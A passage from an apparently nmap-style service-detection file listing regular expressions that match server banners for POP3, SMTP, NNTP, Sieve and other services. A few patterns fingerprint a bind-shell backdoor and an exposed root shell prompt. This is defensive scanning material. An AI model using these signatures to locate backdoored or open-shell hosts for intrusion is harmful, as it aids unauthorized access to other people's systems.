posting allowed\r\n -200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n -200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n -[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 -.\0\x02\0([^\0]+)\0+.\0\x01\0 -200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n -\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n -pbmasterd(\d[-.\w]+)@[-.+\w]+: -match pharos m=^PSCOM(?:\xb6|\)\0\0.*AUTHENTICATE=s p/Pharos Notify/ i/printing client/ -PJLINK 1 [0-9a-f]{8}\r -201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n -\x01\x04\0\0\0\0\0\rD -NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 -usage: [/\w]*/etc/pksd\.conf conf_file\n -version report\n -welcome to the pioneers-meta-server version ([\d.]+)\n -\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n -\+OK Ready when you are <200\d+\. -\+OK Internet Rex POP3 server ready < -\+OK DBMAIL pop3 server ready to rock < -\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n -\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 -\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 -\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n -\+OK [Dd]ovecot ready\.\r\n -\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n -\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n -\+OK ready \r\n -\+OK POP3 server ready \r\n -\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d -\+OK Welcome to MailEnable POP3 Server -\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n -\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n -\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n -\+OK Lotus Notes POP3 server version ([-.\w]+) ready on -\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < -\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready -\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n -\+OK POP3 \[cppop (\d[^]]+)\] at \[ -\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n -\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n -\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n -\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) -\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n -\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n -\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n -\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n -\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n -\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n -\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready -\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n -\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at -\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n -\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n -\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n -\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) -\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n -\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n -\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 -\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready -\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK\r\n -\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready <\w{11}>\r\n -\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n -\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < -\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n -match pop3 m=^\+OK POP3-Server Classic Hamster (?:Vr\.|Version) [\d.]+ \(Build ([\d.]+)\) greets you! <.*>\r\n= p/Classic Hamster pop3d/ v/1/ o/Windows/ cpe:/o:microsoft:windows/a -\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n -\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n -\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n -\+OK InterMail POP3 server ready\.\r\n -\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n -\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n -\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n -\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n -\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n -\+OK popserver ([\d.]+) pop3 server ready\r\n -\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n -\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n -\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n -\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n -\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n -\+OK ready\r\n -\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n -\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < -\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; -\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; -\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n -\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) -\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n -match pop3 m=^\+OK (?:modusMail|ModusMail) POP3 Server ([\w._-]+) Ready <[\d.]+@([-\w_.]+)>\r\n= p/ModusMail pop3d/ v/1/ o/Windows/ h/2/ cpe:/o:microsoft:windows/a -\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n -\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n -\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n -\+OK \(POP3\) hMailServer ([-\w.]+)\r\n -\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n -\+OK DAWKCo POP3 Server v([-\w_.]+) ready < -\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n -\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) -\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), -\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n -\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n -\+OK 4D Mail ([-\w_.]+) ready < -\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at -\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n -\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n -\+OK Welcome to Arvixe POP3 server\.\r\n -\+OK POP3 Server ready\r\n -\+OK POP3 server ready\r\n -\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n -\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n -\+OK popd-([\d.]+) ready \r\n -\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ --ERR Permission denied - closing connection\.\r\n -\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n -\+OK <[\d.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK ready <[\d.]+@([-\w_.]+)>\r\n -\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n -\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. -\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n -\+OK [-\w_.]+ Welcome to the mail server\.\r\n -\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n -\+OK ([-\w_.]+) running EIMS X ([\w.]+) < -\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < -\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n -\+OK Dovecot DA ready\.\r\n -Unable to open trace file \"/var/spool/popper/ -\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n -\+OK Pop3 ready\.\r\n -\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n -\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n -\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n -\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n -Proxy\+ POP3 server\. Insecure access - terminating\.\r\n -\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n -\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n -\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n -\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n -\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n -\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n -\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n --ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n -\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n -\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n -\+OK ([-\w_.]+) POP3 proxy ready\r\n -\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n -\+OK InterScan VirusWall POP3 Proxy\r\n --ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n -\+OK MrPostman webmail proxy ready\r\n -\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n -\+OK hello from popgate\(([\d.]+)\)\r\n -\+OK \[ISafe POP3 Proxy\] \r\n -\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n -\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n -\+OK kingate pop3 proxy\r\n -\+OK avast! POP3 proxy ready\.\r\n -\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n -200 ([-._\w]+) poppassd v?([-._\w]+) -200 poppassd hello, who are you\?\r\n -200 hello there, who are you\?\r\n -200 hello there, please tell me who you are\r\n -200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n -200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service -200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n -200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < -550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n -200 Post\.Office v([\d.]+) password server ready\r\n -\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n -lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd -lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n -([-\w_.]+): lpd: address for your hostname \([\d.]+\) not matched\n -([-\w_.]+): /usr/lib/lpd: Malformed from address\n -\d+-201 ill-formed FROM address\. -\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ -QAS2 -\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 -\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 -200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n -\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 -_realplayfavs_::([\w\s]+)::connected\0 -(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t -\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 -\xe1\xe7\xe6\x07\0\x01\0 -roku: ready\r\n -\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian -\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 -\x02\x1c50\x1c\x03\0\0\0\0 -\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap -\"IMPLEMENTATION\" \"dovecot\"\r\n -\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n -/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n -\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n -SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> -t\x03\0\0 -\x01remshd: Kerberos Authentication not enabled\.\n -\x01remshd: Error! Kerberos authentication failed -(?:ba)?sh-\d\.\d\d\w?# -:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n -GENERAL: \d+ \d+\n -220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n -# will match the replayed greeting of the proxied server! -220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n -220 ([-/.+\w]+) MailGate ready for ESMTP on -220 ([-/.+\w]+) SMTP ready to roll\r\n -220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n -220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n -554-([-.+\w]+)\.us\r\n554 Access denied\r\n -220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at -220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n -554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; -220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd -520 Connection not authorised from this address\.\r\n -554 SMTP service not available\r\n -220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready -421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 -220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n -220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n -220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n -220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n -220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n -421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n -220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready -220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at -220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n -220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready -220 \+OK Microsoft Exchange SMTP server version ([\d.]+) -220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim -220 CheckPoint FireWall-1 secure ESMTP server\r\n -220 CheckPoint FireWall-1 secure SMTP server\r\n -220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd -220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at -220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at -220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at -530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at -220 ([-.+\w]+) SMTP/smap Ready\.\r\n -220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at -220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n -220(\S+) WebShielde(\w+)/SMTP Ready. -220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n -220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) -220 [\*\d\ ]{2,300}\r\n -220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n -220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-.\w]+) ESMTP Service. Welcome.\r\n -220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n -220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at -220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready -220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at -220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at -220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready -220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n -220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n -220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); -220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n -220 YSmtp(\S+) ESMTP service ready -220 (\S+) ESMTP WEB.DE V([^\s\;]+) -220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP -220 Welcome to Nemesis ESMTP server on \S+ -220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) -220 (\S+) ESMTP XWall v(\d\S+) -220 (\S+) eMail Sentinel (\d+) ESMTP Service ready -220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n -220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n -220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) -220[- ][^ ]+ Smail-([^ ]+) -220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n -220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n -220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n -220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n -220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n -220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n -220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) -220 ([-\w_.]+) ESMTP postfix NO UCE\r\n -220 ([-\w_.]+) SMTPD Server - Postfix\r\n -220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n -220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n -220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n -220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n -220 ESMTP Lyris service ready\r\n -220 ESMTP Lyris ListManager service ready\r\n -220 ([-\w_.]+) SMTP Ready 12\.\r\n -220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n -220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n -220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n -220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n -220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n -220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready -220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n -220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); -421 Sorry, SMTP server too busy right now \(193\); try again later\r\n -220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n -220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] -220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n -220 ([-\w_.]+) mailfront ESMTP\r\n -220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n -220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n -220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n -220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n -220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n -220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n -500 Permission denied - closing connection\.\r\n -220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n -220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n -220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n -220 LiteMail SMTP Server Ready\.\r\n -220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n -220 ([-\w_.]+) SMTP Server \(DeskNow\) ready -220 network-box ESMTP\r\n -220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n -220 ([-\w_.]+) AntiVir MailGate\r\n -220 server ESMTP KEN! v([\d.]+); .*\r\n -220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n -220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 -220 shttp\.srv Simple Mail Transfer Service Ready\r\n -501 Domain must resolve\r\n -220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n -220 mailmatrix SMTP Server \(Mail Matrix Server\) ready -220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); -220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n -220 ([-\w_.]+); .* \+\d+\r\n -421 unable to read controls \(#4\.3\.0\)\r\n -554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n -rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n -220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n -220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), -220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail -220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready -220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n -220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n -220 DP-3510\r\n -220 ([-\w_.]+) Axigen ESMTP ready\r\n -421 Unexpected log failure, please try later\r\n -220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( -220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ -554 ([-\w_.]+) ESMTP not accepting messages\r\n -220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready -220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n -220 ShareMailPro SMTP Server Ready \r\n -220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready -220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n -220 Service ready KM([\w._-]+) smtpd\r\n -220 ([\w_.-]+) cqgreylist - minimal smptd\r\n -220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); -220 DP-1820E\r\n -220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n -220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) -220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n -220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n -220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready -421 Service not available, closing transmission channel\r\n -421 Service not available, closing transmission channel \r\n -220 ([\w_.-]+) ESMTP OpenSMTPD\r\n -220 ([\w_.-]+) ESMTP Citadel server 